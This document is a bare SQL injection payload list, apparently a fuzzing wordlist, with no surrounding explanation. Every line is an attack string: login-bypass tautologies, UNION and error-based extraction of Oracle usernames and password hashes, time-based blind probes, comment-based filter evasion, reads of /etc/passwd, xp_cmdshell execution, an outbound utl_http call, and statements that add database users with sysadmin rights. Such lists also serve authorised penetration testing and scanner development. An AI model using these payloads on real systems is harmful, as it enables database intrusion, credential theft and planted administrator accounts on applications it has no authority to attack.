a
 | 
						||
a' 
 | 
						||
a' --
 | 
						||
a' or 1=1; --
 | 
						||
@
 | 
						||
?
 | 
						||
' and 1=0) union all
 | 
						||
? or 1=1 --
 | 
						||
x' and userid is NULL; --
 | 
						||
x' and email is NULL; --
 | 
						||
anything' or 'x'='x
 | 
						||
x' and 1=(select count(*) from tabname); --
 | 
						||
x' and members.email is NULL; --
 | 
						||
x' or full_name like '%bob%
 | 
						||
23 or 1=1; --
 | 
						||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
 | 
						||
a
 | 
						||
1 or 1=1
 | 
						||
1' or '1'='1
 | 
						||
1 and user_name() = 'dbo'
 | 
						||
1
 | 
						||
1'1
 | 
						||
1 exec sp_ (or exec xp_)
 | 
						||
1 and 1=1
 | 
						||
1' and 1=(select count(*) from tablenames); --
 | 
						||
1
 | 
						||
1 and user_name() = 'dbo'
 | 
						||
\'; desc users; --
 | 
						||
1\'1
 | 
						||
1' and non_existant_table = '1
 | 
						||
' or username is not NULL or username = '
 | 
						||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
 | 
						||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
 | 
						||
1 uni/**/on select all from where
 | 
						||
’ or ‘1’=’1
 | 
						||
' or '1'='1
 | 
						||
'||utl_http.request('httP://192.168.1.1/')||'
 | 
						||
' || myappadmin.adduser('admin', 'newpass') || '
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
 | 
						||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
 | 
						||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
 | 
						||
||6
 | 
						||
'||'6
 | 
						||
(||6)
 | 
						||
' or 1=1-- 
 | 
						||
or 1=1
 | 
						||
' or '1'='1
 | 
						||
; or '1'='1'
 | 
						||
" or isNULL(1/0) /*
 | 
						||
' or '7659'='7659
 | 
						||
" or isNULL(1/0) /*
 | 
						||
' -- 
 | 
						||
' or 1=1--
 | 
						||
" or 1=1--
 | 
						||
' or 1=1 /*
 | 
						||
or 1=1--
 | 
						||
' or 'a'='a
 | 
						||
" or "a"="a
 | 
						||
') or ('a'='a
 | 
						||
admin' or '
 | 
						||
' select * from information_schema.tables--
 | 
						||
) union select * from information_schema.tables;
 | 
						||
' having 1=1--
 | 
						||
' having 1=1--
 | 
						||
' group by userid having 1=1--
 | 
						||
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
 | 
						||
' or 1 in (select @@version)--
 | 
						||
' union all select @@version--
 | 
						||
' or 'unusual' = 'unusual'
 | 
						||
' or 'something' = 'some'+'thing'
 | 
						||
' or 'text' = n'text'
 | 
						||
' or 'something' like 'some%'
 | 
						||
' or 2 > 1
 | 
						||
' or 'text' > 't'
 | 
						||
' or 'whatever' in ('whatever')
 | 
						||
' or 2 between 1 and 3
 | 
						||
' or username like char(37);
 | 
						||
' union select * from users where login = char(114,111,111,116);
 | 
						||
' union select 
 | 
						||
password:*/=1--
 | 
						||
uni/**/on sel/**/ect
 | 
						||
'; execute immediate 'sel' || 'ect us' || 'er'
 | 
						||
'; exec ('sel' + 'ect us' + 'er')
 | 
						||
'/**/or/**/1/**/=/**/1
 | 
						||
' or 1/*
 | 
						||
 or isNULL(1/0) /*
 | 
						||
' or '7659'='7659
 | 
						||
" or isNULL(1/0) /*
 | 
						||
' -- &password=
 | 
						||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > 
 | 
						||
@var select @var as var into temp end --
 | 
						||
' and 1 in (select var from temp)--
 | 
						||
' union select 1,load_file('/etc/passwd'),1,1,1;
 | 
						||
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
 | 
						||
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
 | 
						||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
 | 
						||
create user name identified by 'pass123'
 | 
						||
create user name identified by pass123 temporary tablespace temp default tablespace users; 
 | 
						||
' ; drop table temp --
 | 
						||
exec sp_addlogin 'name' , 'password'
 | 
						||
exec sp_addsrvrolemember 'name' , 'sysadmin'
 | 
						||
insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
 | 
						||
grant connect to name; grant resource to name;
 | 
						||
insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
 | 
						||
' or 1=1 --
 | 
						||
' union (select @@version) --
 | 
						||
' union (select NULL, (select @@version)) --
 | 
						||
' union (select NULL, NULL, (select @@version)) --
 | 
						||
' union (select NULL, NULL, NULL,  (select @@version)) --
 | 
						||
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
 | 
						||
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
 | 
						||
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
 | 
						||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
 | 
						||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
 | 
						||
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
 | 
						||
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
 | 
						||
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
 | 
						||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
 | 
						||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- |